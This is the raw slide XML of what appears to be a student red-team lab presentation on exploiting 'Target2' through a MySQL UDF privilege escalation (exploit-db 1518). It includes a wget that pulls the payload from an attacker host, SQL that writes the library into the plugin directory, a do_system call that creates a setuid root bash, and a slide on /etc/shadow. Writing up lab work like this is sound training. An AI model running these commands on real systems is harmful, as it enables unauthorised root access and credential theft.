                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Finding_Exploit.md</a:t>
            </a:r>
            <a:endParaRPr sz="22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None/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200"/>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lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1237475" y="4703625"/>
            <a:ext cx="7776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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://exploit-db.com/exploits/1518</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="6FA8DC"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="181" name="Google Shape;181;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333138" y="1544125"/>
            <a:ext cx="5953125" cy="3067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5" name="Shape 185"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Google Shape;186;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285275" y="275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rgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Target2_Exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Transferring_Exploit.md</a:t>
            </a:r>
            <a:endParaRPr sz="21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t/>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Google Shape;18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latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Using the Python Simple HTTP service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="93C47D"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>`python -m SimpleHTTPServer 80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>`, we can use the remote shell to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="93C47D"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>`wget 192.168.1.90/temp/1518.so`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>, which downloads the file onto my target machine, giving the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t> extra privileges, we can download it on the target system with the remote terminal we got executing the line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="93C47D"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>`wget 192.168.1.90/temp/1518.so`</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="93C47D"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Cod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91" name="Shape 191"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282775" y="242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3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Target2_Exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Injection.md</a:t>
            </a:r>
            <a:endParaRPr>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93" name="Google Shape;193;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282775" y="1164050"/>
            <a:ext cx="8520600" cy="3773700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="6FA8DC"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7509175" y="4821900"/>
            <a:ext cx="33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5" name="Google Shape;195;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1362663"/>
            <a:ext cx="3520473" cy="2418187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104263" y="3410250"/>
            <a:ext cx="3877500" cy="3693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t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Google Shape;197;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4011900" y="1463550"/>
            <a:ext cx="4689600" cy="22164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rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insert into foo values(load_file('/tmp/1518.so'));</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sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from foo into dumpfile '.usr/lib/1518.so';</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sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>create function do_systems returns integer soname '1518.so';</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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';</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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>create function do_system returns integer soname 1518.so</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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from mysql.func</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Google Shape;198;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2295300" y="4821900"/>
            <a:ext cx="6848700" cy="323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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://atom.hackstreetboys.ph/linux-privilege-escalation-service-exploit/</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Google Shape;199;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4141025" y="4431475"/>
            <a:ext cx="33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181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AA84F"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>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Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Briggs Bastian</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Sean Wyman</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Jesse Smith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Gary “Spike” Mantese</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Jamie Alonzo</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Cod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306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rgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Target2_Exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Copy_Root_shell.md</a:t>
            </a:r>
            <a:endParaRPr sz="22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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;20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2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1610000"/>
            <a:ext cx="5186525" cy="2164100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="Google Shape;207;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="309175" y="1143000"/>
            <a:ext cx="50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8" name="Google Shape;208;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299800" y="1161750"/>
            <a:ext cx="84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Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>elect do_system(‘cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash’);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384125" y="3822500"/>
            <a:ext cx="7869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Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>xit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>www-data@target2: /tmp/rootbash -p</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>rootbash-4.3# </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Cod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3" name="Shape 213"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="354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3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Target2_Exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>etc_shadow.md</a:t>
            </a:r>
            <a:endParaRPr>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15" name="Google Shape;21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33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1235150"/>
            <a:ext cx="8520600" cy="376000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="217" name="Google Shape;217;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1919500"/>
            <a:ext cx="8839201" cy="303550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="218" name="Google Shape;218;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2305725"/>
            <a:ext cx="8520600" cy="376000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="219" name="Google Shape;219;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2843950"/>
            <a:ext cx="3167450" cy="23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3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Red_Team/Target2_Exploit/</a:t>
